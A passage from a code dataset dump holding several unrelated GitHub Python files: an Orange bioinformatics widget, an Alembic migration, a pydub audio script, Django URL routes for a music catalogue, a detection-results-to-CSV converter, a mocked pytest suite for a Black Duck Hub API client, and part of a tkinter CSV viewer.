    No input

    \")\n\n def updateDictyExpressLink(self, genes, show=False):\n def fix(ddb):\n if ddb.startswith(\"DDB\"):\n if not ddb.startswith(\"DDB_G\"):\n ddb = ddb.replace(\"DDB\", \"DDB_G\")\n return ddb\n return None\n if show:\n genes = [fix(gene) for gene in genes if fix(gene)]\n link1 = 'Microarray profile'\n link2 = 'RNA-Seq profile'\n self.linkLabel.setText(link1 + \"
    \" + link2)\n\n show = any(genes)\n\n if show:\n self.dictyExpressBox.show()\n else:\n self.dictyExpressBox.hide()\n\n def onDictyExpressLink(self, link):\n if not self.data:\n return\n\n selectedIndexes = self.treeWidget.selectedIndexes()\n if not len(selectedIndexes):\n QMessageBox.information(\n self, \"No gene ids selected\",\n \"Please select some genes and try again.\"\n )\n return\n model = self.treeWidget.model()\n mapToSource = model.mapToSource\n selectedRows = self.treeWidget.selectedIndexes()\n selectedRows = [mapToSource(index).row() for index in selectedRows]\n model = model.sourceModel()\n\n selectedGeneids = [self.row2geneinfo[row] for row in selectedRows]\n selectedIds = [self.geneinfo[i][0] for i in selectedGeneids]\n selectedIds = set(selectedIds)\n\n def fix(ddb):\n if ddb.startswith(\"DDB\"):\n if not ddb.startswith(\"DDB_G\"):\n ddb = ddb.replace(\"DDB\", \"DDB_G\")\n return ddb\n return None\n\n genes = [fix(gene) for gene in selectedIds if fix(gene)]\n url = str(link) % \" \".join(genes)\n QDesktopServices.openUrl(QUrl(url))\n\n def onAltSourceChange(self):\n self.updateInfoItems()\n\n def onDeleteWidget(self):\n OWWidget.onDeleteWidget(self)\n\n # try to cancel pending tasks\n if self.initfuture:\n self.initfuture.cancel()\n if self.itemsfuture:\n self.itemsfuture.cancel()\n\n self.executor.shutdown()\n\n\ndef reportItemView(view):\n model = view.model()\n return reportItemModel(view, model)\n\n\ndef reportItemModel(view, model, index=QModelIndex()):\n if not index.isValid() or model.hasChildren(index):\n columnCount, rowCount = model.columnCount(index), model.rowCount(index)\n if not index.isValid():\n text = ('\\n' +\n ''.join('' %\n model.headerData(i, Qt.Horizontal, Qt.DisplayRole)\n .toString()\n for i in range(columnCount)) +\n '\\n')\n else:\n pass\n text += ''.join('' +\n ''.join('' for column in range(columnCount)) +\n '\\n'\n for row in range(rowCount)\n if not view.isRowHidden(row, index))\n text += '
    %s
    ' + reportItemModel(view, model, model.index(row, column, index)) +\n '
    '\n return text\n else:\n variant = model.data(index, Qt.DisplayRole)\n return str(variant.toString()) if variant.isValid() else \"\"\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n data = Orange.data.Table(\"brown-selected.tab\")\n w = OWGeneInfo()\n w.show()\n\n w.setData(data)\n app.exec_()\n w.saveSettings()\n","repo_name":"biolab/orange-bio","sub_path":"orangecontrib/bio/widgets/OWGeneInfo.py","file_name":"OWGeneInfo.py","file_ext":"py","file_size_in_byte":25907,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"51"} +{"seq_id":"32539559293","text":"\"\"\"pic id added to weather report table\n\nRevision ID: 127a2b9080b1\nRevises: f4a49fd05e68\nCreate Date: 2020-09-30 01:27:42.597890\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '127a2b9080b1'\ndown_revision = 'f4a49fd05e68'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('good_morning_report', sa.Column('pic_id', sa.String(length=10), nullable=True))\n op.execute(\"UPDATE good_morning_report SET pic_id = '10d'\")\n op.alter_column('good_morning_report', 'pic_id', nullable=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('good_morning_report', 'pic_id')\n # ### end Alembic commands ###\n","repo_name":"AlecJ/rpgmanager","sub_path":"migrations/versions/127a2b9080b1_pic_id_added_to_weather_report_table.py","file_name":"127a2b9080b1_pic_id_added_to_weather_report_table.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"30325544150","text":"# Playing with Music\nfrom glob import glob\nfrom pydub import AudioSegment\n\nplaylist_songs = [AudioSegment.from_mp3(mp3_file) for mp3_file in glob(\"*.mp3\")]\n# print(playlist_songs)\n# first_song = playlist_songs.pop(0)\n# first_song = first_song[:5000] # milliseconds to seconds\n# second_song = playlist_songs.pop(0)\n# second_song = second_song[31000:41000] # milliseconds to seconds\n# playlist = first_song + second_song\n# playlist_length = len(playlist) / (1000 * 60)\n# # lets save it!\n# out_f = open(\"playlist.mp3\", 'wb')\n#\n# playlist.export(out_f, format='mp3')\n\nsong = playlist_songs.pop(1)\nten_seconds = 10 * 1000\nfirst_10_seconds = song[:ten_seconds]\nlast_5_seconds = song[-5000:]\nbeginning = first_10_seconds + 6\nend = last_5_seconds - 3\nwithout_the_middle = beginning + end\nwith_style = beginning.append(end, crossfade=1500)\ndo_it_over = with_style * 2\nawesome = do_it_over.fade_in(2000).fade_out(3000)\nawesome.export(\"mashup.mp3\", format=\"mp3\")\n","repo_name":"CleverProgrammer/python-programs","sub_path":"python_music/music_playground.py","file_name":"music_playground.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"7890640135","text":"from django.urls import include, path\n\nfrom .views import *\n\ntrack_urlpatterns = [\n path('.list', TrackListView.as_view(), name='track-list'),\n path('.update//', TrackUpdateView.as_view(), name='track-update'),\n path('.delete//', TrackDestroyView.as_view(), name='track-destroy'),\n path('.details//', TrackDetailsView.as_view(), name='track-details'),\n]\n\nartist_urlpatterns = [\n path('.list', ArtistListView.as_view(), name='artist-list'),\n path('.update//', ArtistUpdateView.as_view(), name='artist-update'),\n path('.delete//', ArtistDestroyView.as_view(), name='artist-destroy'),\n path('.details//', ArtistDetailsView.as_view(), name='artist-details'),\n]\n\nalbum_urlpatterns = [\n path('.list', AlbumListView.as_view(), name='album-list'),\n path('.update//', AlbumUpdateView.as_view(), name='album-update'),\n path('.delete//', AlbumDestroyView.as_view(), name='album-destroy'),\n path('.details//', AlbumDetailsView.as_view(), name='album-details'),\n]\n\ncustomer_urlpatterns = [\n path('.list', CustomerListView.as_view(), name='customer-list'),\n path('.update//', CustomerUpdateView.as_view(), name='customer-update'),\n path('.delete//', CustomerDestroyView.as_view(), name='customer-destroy'),\n path('.details//', CustomerDetailsView.as_view(), name='customer-details'),\n]\n\nemployee_urlpatterns = [\n path('.list', EmployeeListView.as_view(), name='employee-list'),\n path('.update//', EmployeeUpdateView.as_view(), name='employee-update'),\n path('.delete//', EmployeeDestroyView.as_view(), name='employee-destroy'),\n path('.details//', EmployeeDetailsView.as_view(), name='employee-details'),\n]\n\ngenre_urlpatterns = [\n path('.list', GenreListView.as_view(), name='genre-list'),\n path('.update//', GenreUpdateView.as_view(), name='genre-update'),\n path('.delete//', GenreDestroyView.as_view(), name='genre-destroy'),\n path('.details//', GenreDetailsView.as_view(), name='genre-details'),\n]\n\ninvoice_urlpatterns = [\n path('.list', InvoiceListView.as_view(), name='invoice-list'),\n path('.update//', InvoiceUpdateView.as_view(), name='invoice-update'),\n path('.delete//', InvoiceDestroyView.as_view(), name='invoice-destroy'),\n path('.details//', InvoiceDetailsView.as_view(), name='invoice-details'),\n]\n\nmedia_type_urlpatterns = [\n path('.list', MediaTypeListView.as_view(), name='media_type-list'),\n path('.update//', MediaTypeUpdateView.as_view(), name='media_type-update'),\n path('.delete//', MediaTypeDestroyView.as_view(), name='media_type-destroy'),\n path('.details//', MediaTypeDetailsView.as_view(), name='media_type-details'),\n]\n\nplaylist_urlpatterns = [\n path('.list', PlaylistListView.as_view(), name='playlist-list'),\n path('.update//', PlaylistUpdateView.as_view(), name='playlist-update'),\n path('.delete//', PlaylistDestroyView.as_view(), name='playlist-destroy'),\n path('.details//', PlaylistDetailsView.as_view(), name='playlist-details'),\n]\n\ninvoice_item_urlpatterns = [\n path('.list', InvoiceItemListView.as_view(), name='invoice_item-list'),\n path('.update//', InvoiceItemUpdateView.as_view(), name='invoice_item-update'),\n path('.delete//', InvoiceItemDestroyView.as_view(), name='invoice_item-destroy'),\n path('.details//', InvoiceItemDetailsView.as_view(), name='invoice_item-details'),\n]\n\nurlpatterns = [\n path(\"track\", include(track_urlpatterns)),\n path(\"artist\", include(artist_urlpatterns)),\n path(\"album\", include(album_urlpatterns)),\n path(\"customer\", include(customer_urlpatterns)),\n path(\"employee\", include(employee_urlpatterns)),\n path(\"genre\", include(genre_urlpatterns)),\n path(\"invoice\", include(invoice_urlpatterns)),\n path(\"invoice_item\", include(invoice_item_urlpatterns)),\n path(\"media_type\", include(media_type_urlpatterns)),\n path(\"playlist\", include(playlist_urlpatterns)),\n]\n","repo_name":"DivyamaniArya/django_music_directory","sub_path":"chinook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23436475625","text":"import csv\n\nresult_json= [\n\"\"\"\n# paste the result.json here\n# demo:\n\n{\n \"frame_id\":1, \n \"filename\":\"data/test/2010111918.jpg\", \n \"objects\": [ \n\n ] \n}, \n...\n\"\"\"\n]\n\ndef main(result_json):\n with open('results_v1.csv', 'w', newline='') as csvfile:\n \n fieldnames = ['image_filename', 'label_id', 'x', 'y', 'w', 'h', 'confidence']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n \n for ele in result_json:\n \n filename = get_filename(ele[\"filename\"])\n \n if ele[\"objects\"] != []:\n for bbox in ele[\"objects\"]:\n label_id, x, y, w, h, confidence = get_bbox_info(bbox)\n \n print(filename, label_id + 1, x, y, w, h, confidence)\n writer.writerow({'image_filename': filename, 'label_id': label_id + 1, 'x': x, 'y': y, 'w': w, 'h': h, 'confidence': confidence})\n\ndef get_filename(file_path):\n filenames = file_path.split(\"/\")\n filename = filenames[-1]\n return filename\n\ndef get_bbox_info(obj):\n label_id = obj[\"class_id\"]\n cx = obj[\"relative_coordinates\"][\"center_x\"]\n cy = obj[\"relative_coordinates\"][\"center_y\"]\n w = obj[\"relative_coordinates\"][\"width\"]\n h = obj[\"relative_coordinates\"][\"height\"]\n confidence = obj[\"confidence\"]\n \n cx = cx * 400\n cy = cy * 300\n w = w * 400\n h = h * 300\n \n x = cx - w/2\n y = cy - h/2\n \n x = round(x)\n y = round(y)\n w = round(w)\n h = round(h)\n \n return label_id, x, y, w, h, confidence\n\nmain(result_json)","repo_name":"Ratherman/AI","sub_path":"DeepLearning/HW6/parse_json_to_csv.py","file_name":"parse_json_to_csv.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5063635669","text":"#!/usr/bin/env python\n\nimport copy\nimport json\nimport os\nimport pytest\nimport re\nfrom urllib.parse import urlparse\n\nfrom blackduck.HubRestApi import HubInstance\nfrom unittest.mock import patch, MagicMock, mock_open\n\n\nfake_hub_host = \"https://my-hub-host\"\n\n\ndef return_auth_token(api_token):\n if api_token:\n return (\"the-token\", \"the-csrf-token\")\n else:\n return (\"the-token\", None)\n\ninvalid_bearer_token=\"anInvalidTokenValue\"\ninvalid_csrf_token=\"anInvalidCSRFTokenValue\"\nmade_up_api_token=\"theMadeUpAPIToken\"\n\ndef setup_function(function):\n # Remove .restconfig file before running any test\n try:\n os.remove(HubInstance.configfile)\n except OSError:\n pass\n\ndef teardown_function(function):\n # Remove .restconfig file after running any test\n try:\n os.remove(HubInstance.configfile)\n except OSError:\n pass\n \n@pytest.fixture()\ndef mock_hub_instance(requests_mock):\n requests_mock.post(\n \"{}/j_spring_security_check\".format(fake_hub_host), \n headers={\"Set-Cookie\": 'AUTHORIZATION_BEARER={}; Path=/; secure; Secure; HttpOnly'.format(invalid_bearer_token)}\n )\n requests_mock.get(\n \"{}/api/current-version\".format(fake_hub_host),\n json = {\n \"version\": \"2018.11.0\",\n \"_meta\": {\n \"allow\": [\n \"GET\"\n ],\n \"href\": \"{}/api/current-version\".format(fake_hub_host)\n }\n }\n )\n yield HubInstance(fake_hub_host, \"a_username\", \"a_password\")\n\n@pytest.fixture()\ndef mock_hub_instance_using_api_token(requests_mock):\n requests_mock.post(\n \"https://my-hub-host/api/tokens/authenticate\", \n content = json.dumps({'bearerToken': invalid_bearer_token}).encode('utf-8'),\n headers={\n 'X-CSRF-TOKEN': invalid_csrf_token, \n 'Content-Type': 'application/json'\n }\n )\n requests_mock.get(\n \"{}/api/current-version\".format(fake_hub_host),\n json = {\n \"version\": \"2018.11.0\",\n \"_meta\": {\n \"allow\": [\n \"GET\"\n ],\n \"href\": \"{}/api/current-version\".format(fake_hub_host)\n }\n }\n )\n\n yield HubInstance(fake_hub_host, api_token=made_up_api_token)\n\n@pytest.fixture()\ndef policy_info_json(shared_datadir):\n yield json.load((shared_datadir / \"policies.json\").open())\n\n@pytest.fixture()\ndef a_test_policy(policy_info_json):\n test_policy = policy_info_json['items'][0]\n yield test_policy\n\n@pytest.fixture()\ndef a_test_policy_for_create_or_update(a_test_policy):\n # a_policy_for_creating_or_updating = dict(\n # (attr, test_policy[attr]) for attr in \n # ['name', 'description', 'enabled', 'overridable', 'expression', 'severity'] if attr in test_policy)\n # yield a_policy_for_creating_or_updating\n yield a_test_policy\n\n@pytest.fixture()\ndef test_vulnerability_info(requests_mock, shared_datadir):\n yield json.loads((shared_datadir / \"sample-vulnerability.json\").read_text())\n\ndef test_get_major_version(requests_mock):\n requests_mock.post(\n \"{}/j_spring_security_check\".format(fake_hub_host), \n headers={\"Set-Cookie\": 'AUTHORIZATION_BEARER={}; Path=/; secure; Secure; HttpOnly'.format(invalid_bearer_token)}\n )\n for version in [\"2018.11.0\", \"5.0.2\", \"4.8.3\", \"3.7.2\"]:\n expected = version.split(\".\")[0]\n requests_mock.get(\n \"{}/api/current-version\".format(fake_hub_host),\n json = {\n \"version\": \"{}\".format(version),\n \"_meta\": {\n \"allow\": [\n \"GET\"\n ],\n \"href\": \"{}/api/current-version\".format(fake_hub_host)\n }\n }\n )\n hub = HubInstance(fake_hub_host, \"a_username\", \"a_password\")\n assert hub.bd_major_version == expected\n\ndef test_get_headers(mock_hub_instance):\n # somewhat contrived, but it does execute all the paths\n # TODO: better way to test this one?\n #\n the_api_token = \"fake-api-token\"\n the_csrf_token = \"fake-csrf-token\"\n the_token = \"fake-bearer-token\"\n mock_hub_instance.config['api_token'] = the_api_token\n mock_hub_instance.csrf_token = the_csrf_token\n mock_hub_instance.token = the_token\n\n assert mock_hub_instance.get_headers() == {\n 'X-CSRF-TOKEN': the_csrf_token, \n 'Authorization': \"Bearer {}\".format(the_token),\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'}\n\n del mock_hub_instance.config['api_token']\n for bd_major_version in [\"2018\", \"5\", \"4\", \"3\"]:\n if bd_major_version == \"3\":\n expected = {\"Cookie\": mock_hub_instance.cookie}\n else:\n expected = {\"Authorization\":\"Bearer \" + mock_hub_instance.token}\n\n mock_hub_instance.bd_major_version = bd_major_version\n assert mock_hub_instance.get_headers() == expected\n\ndef test_get_policy_url(mock_hub_instance):\n assert mock_hub_instance._get_policy_url() == fake_hub_host + \"/api/policy-rules\"\n\ndef test_get_parameter_string(mock_hub_instance):\n assert mock_hub_instance._get_parameter_string({\"limit\":\"100\"}) == \"?limit=100\"\n assert mock_hub_instance._get_parameter_string({\"limit\":\"100\", \"q\":\"name:my-name\"}) == \"?limit=100&q=name%3Amy-name\"\n assert mock_hub_instance._get_parameter_string({\"limit\":\"100\", \"sort\":\"updatedAt\"}) == \"?limit=100&sort=updatedAt\"\n\ndef test_hub_instance_username_password_for_auth(mock_hub_instance):\n assert mock_hub_instance.get_headers() == {\"Authorization\":\"Bearer {}\".format(invalid_bearer_token)}\n\n assert 'api_token' not in mock_hub_instance.config\n assert 'baseurl' in mock_hub_instance.config\n assert 'username' in mock_hub_instance.config\n assert 'password' in mock_hub_instance.config\n\ndef test_hub_instance_api_token_for_auth(mock_hub_instance_using_api_token):\n assert mock_hub_instance_using_api_token.get_headers() == {\n 'X-CSRF-TOKEN': invalid_csrf_token, \n 'Authorization': 'Bearer {}'.format(invalid_bearer_token), \n 'Content-Type': 'application/json',\n 'Accept': 'application/json'}\n\n assert 'api_token' in mock_hub_instance_using_api_token.config\n assert 'baseurl' in mock_hub_instance_using_api_token.config\n assert 'username' not in mock_hub_instance_using_api_token.config\n assert 'password' not in mock_hub_instance_using_api_token.config\n\ndef test_hub_instance_with_write_config(requests_mock):\n requests_mock.post(\n \"https://my-hub-host/j_spring_security_check\", \n headers={\"Set-Cookie\": 'AUTHORIZATION_BEARER={}; Path=/; secure; Secure; HttpOnly'.format(invalid_bearer_token)}\n )\n requests_mock.get(\n \"{}/api/current-version\".format(fake_hub_host),\n json = {\n \"version\": \"2018.11.0\",\n \"_meta\": {\n \"allow\": [\n \"GET\"\n ],\n \"href\": \"{}/api/current-version\".format(fake_hub_host)\n }\n }\n )\n \n with patch(\"builtins.open\", new_callable=mock_open()) as m:\n with patch('json.dump') as m_json:\n hub = HubInstance(fake_hub_host, \"a_username\", \"a_password\")\n\n m.assert_called_with('.restconfig.json', 'w')\n assert m_json.called\n\ndef test_hub_instance_with_write_config_false(requests_mock):\n requests_mock.post(\n \"https://my-hub-host/j_spring_security_check\", \n headers={\"Set-Cookie\": 'AUTHORIZATION_BEARER={}; Path=/; secure; Secure; HttpOnly'.format(invalid_bearer_token)}\n )\n requests_mock.get(\n \"{}/api/current-version\".format(fake_hub_host),\n json = {\n \"version\": \"2018.11.0\",\n \"_meta\": {\n \"allow\": [\n \"GET\"\n ],\n \"href\": \"{}/api/current-version\".format(fake_hub_host)\n }\n }\n )\n\n with patch.object(HubInstance, \"write_config\") as mock_write_config:\n hub = HubInstance(fake_hub_host, \"a_username\", \"a_password\", write_config_flag=False)\n\n assert not mock_write_config.called\n\ndef test_get_policy_by_id(requests_mock, mock_hub_instance, a_test_policy):\n requests_mock.get(fake_hub_host + \"/api/policy-rules/00000000-0000-0000-0000-000000000001\", json=a_test_policy)\n policy = mock_hub_instance.get_policy_by_id(\"00000000-0000-0000-0000-000000000001\")\n for key in a_test_policy.keys():\n assert policy[key] == a_test_policy[key]\n\ndef test_get_policy_by_url(requests_mock, mock_hub_instance, a_test_policy):\n requests_mock.get(fake_hub_host + \"/api/policy-rules/00000000-0000-0000-0000-000000000001\", json=a_test_policy)\n policy = mock_hub_instance.get_policy_by_url(mock_hub_instance._get_policy_url() + \"/00000000-0000-0000-0000-000000000001\")\n for key in a_test_policy.keys():\n assert policy[key] == a_test_policy[key]\n\ndef test_update_policy_by_id(requests_mock, mock_hub_instance, a_test_policy, a_test_policy_for_create_or_update):\n policy_id = a_test_policy['_meta']['href'].split(\"/\")[-1]\n\n requests_mock.put(fake_hub_host + \"/api/policy-rules/\" + policy_id,\n json=a_test_policy\n )\n response = mock_hub_instance.update_policy_by_id(policy_id, a_test_policy_for_create_or_update)\n assert response.status_code == 200\n assert response.json() == a_test_policy\n\ndef test_update_policy_by_url(requests_mock, mock_hub_instance, a_test_policy, a_test_policy_for_create_or_update):\n policy_id = a_test_policy['_meta']['href'].split(\"/\")[-1]\n policy_url = mock_hub_instance._get_policy_url() + \"/\" + policy_id\n\n requests_mock.put(fake_hub_host + \"/api/policy-rules/\" + policy_id,\n json=a_test_policy\n )\n response = mock_hub_instance.update_policy_by_url(policy_url, a_test_policy_for_create_or_update)\n assert response.status_code == 200\n assert response.json() == a_test_policy\n\ndef test_create_policy(requests_mock, mock_hub_instance, a_test_policy, a_test_policy_for_create_or_update):\n requests_mock.post(fake_hub_host + \"/api/policy-rules\", headers={\"location\": a_test_policy['_meta']['href']}, status_code=201)\n # print(json.dumps(a_test_policy_for_create_or_update))\n new_policy_url = mock_hub_instance.create_policy(a_test_policy_for_create_or_update)\n assert new_policy_url == a_test_policy['_meta']['href']\n\ndef test_delete_policy_by_id(requests_mock, mock_hub_instance, a_test_policy):\n policy_id = a_test_policy['_meta']['href'].split(\"/\")[-1]\n\n requests_mock.delete(fake_hub_host + \"/api/policy-rules/\" + a_test_policy['_meta']['href'].split(\"/\")[-1], status_code=204)\n response = mock_hub_instance.delete_policy_by_id(policy_id)\n assert response.status_code == 204\n\ndef test_delete_policy_by_url(requests_mock, mock_hub_instance, a_test_policy):\n policy_url = mock_hub_instance._get_policy_url() + \"/\" + a_test_policy['_meta']['href'].split(\"/\")[-1]\n\n requests_mock.delete(policy_url, status_code=204)\n response = mock_hub_instance.delete_policy_by_url(policy_url)\n assert response.status_code == 204\n\ndef test_get_vulnerability(requests_mock, mock_hub_instance, test_vulnerability_info):\n vulnerability_url = mock_hub_instance._get_vulnerabilities_url() + \"/{}\".format(test_vulnerability_info['vulnerabilityName'])\n\n requests_mock.get(vulnerability_url, json=test_vulnerability_info)\n response_json = mock_hub_instance.get_vulnerabilities(test_vulnerability_info['vulnerabilityName'])\n\n assert response_json == test_vulnerability_info\n\ndef test_get_projects_with_limit(requests_mock, mock_hub_instance, shared_datadir):\n url = mock_hub_instance.get_urlbase() + \"/api/projects?limit=20\"\n json_data = json.load((shared_datadir / 'sample-projects.json').open())\n requests_mock.get(url, json=json_data)\n projects = mock_hub_instance.get_projects(limit=20)\n\n assert json_data == projects\n assert 'totalCount' in projects\n assert projects['totalCount'] == 18\n\ndef test_get_projects_with_name_query(requests_mock, mock_hub_instance, shared_datadir):\n url = mock_hub_instance.get_urlbase() + \"/api/projects?q=name:accelerator-initializer-ui&limit=100\"\n json_data = json.load((shared_datadir / 'sample-projects-using-name-query.json').open())\n requests_mock.get(url, json=json_data)\n projects = mock_hub_instance.get_projects(parameters={'q':\"name:accelerator-initializer-ui\"})\n\n assert json_data == projects\n assert 'totalCount' in projects\n assert projects['totalCount'] == 1\n\ndef test_get_project_versions(requests_mock, mock_hub_instance, shared_datadir):\n baseurl = mock_hub_instance.get_urlbase()\n url = baseurl + \"/api/projects/65f272df-3a2a-4022-8811-a57e05e82f52/versions?limit=100\"\n json_data = json.load((shared_datadir / 'sample-project-versions.json').open())\n project_json_data = json.load((shared_datadir / 'sample-project.json').open())\n # replace project URL with the right one to agree with our mocked URL above\n project_json_data['_meta']['href'] = re.sub(\"https://.*/api\", \"{}/api\".format(baseurl), project_json_data['_meta']['href'])\n requests_mock.get(url, json=json_data)\n versions = mock_hub_instance.get_project_versions(project_json_data)\n\n assert 'totalCount' in versions\n assert versions['totalCount'] == 1\n\ndef test_get_project_versions_with_parameters(requests_mock, mock_hub_instance, shared_datadir):\n baseurl = mock_hub_instance.get_urlbase()\n url = baseurl + \"/api/projects/65f272df-3a2a-4022-8811-a57e05e82f52/versions?limit=100&q=versionName:1.0\"\n json_data = json.load((shared_datadir / 'sample-project-versions.json').open())\n project_json_data = json.load((shared_datadir / 'sample-project.json').open())\n # replace project URL with the right one to agree with our mocked URL above\n project_json_data['_meta']['href'] = re.sub(\"https://.*/api\", \"{}/api\".format(baseurl), project_json_data['_meta']['href'])\n requests_mock.get(url, json=json_data)\n versions = mock_hub_instance.get_project_versions(project_json_data, parameters={'q':'versionName:1.0'})\n\n assert 'totalCount' in versions\n assert versions['totalCount'] == 1\n assert 'items' in versions\n\ndef test_delete_project_version_by_name():\n # TODO: Write this test\n pass\n\n\ndef test_get_users(requests_mock, mock_hub_instance, shared_datadir):\n baseurl = mock_hub_instance.get_urlbase()\n url = baseurl + \"/api/users\"\n user_json_data = json.load((shared_datadir / \"users.json\").open())\n requests_mock.get(url, json=user_json_data)\n users = mock_hub_instance.get_users()\n\n assert 'totalCount' in users\n assert users['totalCount'] == 1 # cause there was one user in the sample data collected\n assert 'items' in users\n\ndef test_create_user(requests_mock, mock_hub_instance):\n pass\n\ndef test_get_user_by_id(requests_mock, mock_hub_instance):\n pass\n\ndef test_get_user_by_url(requests_mock, mock_hub_instance):\n pass\n\ndef test_update_user_by_id(requests_mock, mock_hub_instance):\n pass\n\ndef test_update_user_by_url(requests_mock, mock_hub_instance):\n pass\n\ndef test_delete_user_by_id(requests_mock, mock_hub_instance):\n pass\n\ndef test_delete_user_by_url(requests_mock, mock_hub_instance):\n pass\n \ndef test_get_project_by_name(requests_mock, mock_hub_instance, shared_datadir):\n url = mock_hub_instance.get_urlbase() + \"/api/projects\"\n projects_json = json.load((shared_datadir / \"sample-projects.json\").open())\n project_name = \"accelerator-initializer-ui\"\n requests_mock.get(url, json=projects_json)\n\n project = mock_hub_instance.get_project_by_name(project_name)\n\n assert project['name'] == project_name\n\ndef test_get_version_by_name(requests_mock, mock_hub_instance, shared_datadir):\n mock_hub_instance.get_project_versions = MagicMock(return_value=json.load((shared_datadir / \"sample-project-versions.json\").open()))\n\n mock_project_obj = MagicMock()\n version_name = \"1.0\" # a version that exists in sample-project-versions.json\n version = mock_hub_instance.get_version_by_name(mock_project_obj, version_name)\n\n assert version['versionName'] == version_name\n\ndef test_create_version_reports(requests_mock, mock_hub_instance):\n pass\n\ndef test_create_version_notices_report(requests_mock, mock_hub_instance):\n pass\n\n@pytest.fixture()\ndef sample_bom_component_json(shared_datadir):\n yield json.load((shared_datadir / \"sample-bom-component.json\").open())\n\n@pytest.fixture()\ndef no_roles_user(shared_datadir):\n yield json.load((shared_datadir / 'no-roles-user.json').open())\n\n@pytest.fixture()\ndef no_roles_roles(shared_datadir):\n yield json.load((shared_datadir / 'no-roles-roles.json').open())\n\n@pytest.fixture()\ndef sysadmin_user(shared_datadir):\n yield json.load((shared_datadir / 'sysadmin-user.json').open())\n\n@pytest.fixture()\ndef sysadmin_roles(shared_datadir):\n yield json.load((shared_datadir / 'sysadmin-roles.json').open())\n\ndef test_user_has_role(no_roles_user, no_roles_roles, sysadmin_user, sysadmin_roles, mock_hub_instance):\n test_roles = [\n 'License Manager', \n 'System Administrator', \n 'Policy Manager', \n 'Project Viewer', \n 'Global Code Scanner', \n 'Project Manager']\n \n mock_hub_instance.get_roles_for_user_or_group = MagicMock()\n mock_hub_instance.get_roles_for_user_or_group.return_value = no_roles_roles\n\n for test_role in test_roles:\n assert mock_hub_instance.user_has_role(no_roles_user, test_role) == False\n\n mock_hub_instance.get_roles_for_user_or_group.return_value = sysadmin_roles\n\n for test_role in test_roles:\n assert mock_hub_instance.user_has_role(sysadmin_user, test_role) == True\n\ndef test_get_link(mock_hub_instance):\n a_url = 'http://a-url'\n link_name = 'a_link_name'\n bd_rest_obj = {'_meta':{'links': [{'rel': link_name, 'href': a_url}]}}\n\n assert mock_hub_instance.get_link(bd_rest_obj, link_name) == a_url\n\ndef test_get_link_returns_None_for_invalid_bd_rest_object(mock_hub_instance):\n bd_rest_obj = {}\n\n assert mock_hub_instance.get_link(bd_rest_obj, 'a_link_name') == None\n\ndef test_validated_json_with_a_dictionary(mock_hub_instance):\n validated_json = mock_hub_instance._validated_json_data({'key':'value'})\n assert isinstance(validated_json, str)\n assert validated_json == '{\"key\": \"value\"}'\n\ndef test_validated_json_with_a_list(mock_hub_instance):\n validated_json = mock_hub_instance._validated_json_data(['item1', 'item2'])\n assert isinstance(validated_json, str)\n assert validated_json == '[\"item1\", \"item2\"]'\n\ndef test_validated_json_with_a_json_str(mock_hub_instance):\n validated_json = mock_hub_instance._validated_json_data('{\"key\": \"value\"}')\n\n assert validated_json == '{\"key\": \"value\"}'\n\ndef test_validated_json_fails_with_invalid_json_str(mock_hub_instance):\n from json import JSONDecodeError\n\n with pytest.raises(JSONDecodeError) as e_info:\n validated_json = mock_hub_instance._validated_json_data('invalid json')\n\n@pytest.fixture()\ndef code_locations(requests_mock, shared_datadir):\n data = json.load((shared_datadir / 'code_locations.json').open())\n requests_mock.get(\n \"{}/api/codelocations?limit=100\".format(fake_hub_host),\n json = data\n )\n yield data\n\ndef test_get_codelocations_all(mock_hub_instance, code_locations):\n code_locs = mock_hub_instance.get_codelocations()\n\n assert code_locs == code_locations\n\ndef test_get_codelocations_unmapped(mock_hub_instance, code_locations):\n code_locs = mock_hub_instance.get_codelocations(unmapped=True)\n\n assert code_locs != code_locations\n\n expected_data = copy.deepcopy(code_locations)\n expected_data['items'] = [cl for cl in code_locations['items'] if 'mappedProjectVersion' not in cl]\n expected_data['totalCount'] = len(expected_data['items'])\n\n assert code_locs == expected_data\n\n\n","repo_name":"blackducksoftware/hub-rest-api-python","sub_path":"test/test_hub_rest_api_python.py","file_name":"test_hub_rest_api_python.py","file_ext":"py","file_size_in_byte":19966,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"51"} +{"seq_id":"15518904525","text":"from tkinter import *\nfrom tkinter import filedialog\nfrom tkinter.ttk import Combobox\nimport pandas as pd\n\nroot = Tk()\nroot.title(\"CSE 350 Project\")\nroot.geometry(\"1325x700\")\nroot.resizable(False, False)\n\nlengthOfHeaders = 0; valueOfCheckList = []; valueOfComboList = []; buttonsAndChecksList = []; df = pd.DataFrame\n\ndef getCSVFile() -> None:\n global df\n root.filename = filedialog.askopenfilename(title=\"Select A CSV File\", filetypes=[(\"CSV Files\", \"*.csv\")])\n df = pd.read_csv(root.filename)\n getCSVHeaders(df)\n gg = Button(root, text = \"Get Graphs & Data\")\n gg.grid(column=0, row=(6+lengthOfHeaders), columnspan=2)\n buttonsAndChecksList.append(gg)\n\ndef getCSVHeaders(df: pd.DataFrame) -> None:\n global lengthOfHeaders, valueOfCheckList, buttonsAndChecksList, valueOfComboList\n valueOfCheckList.clear()\n valueOfComboList.clear()\n lengthOfHeaders = 0\n for chcb in buttonsAndChecksList:\n chcb.destroy()\n for h in df.head(0):\n lengthOfHeaders += 1\n 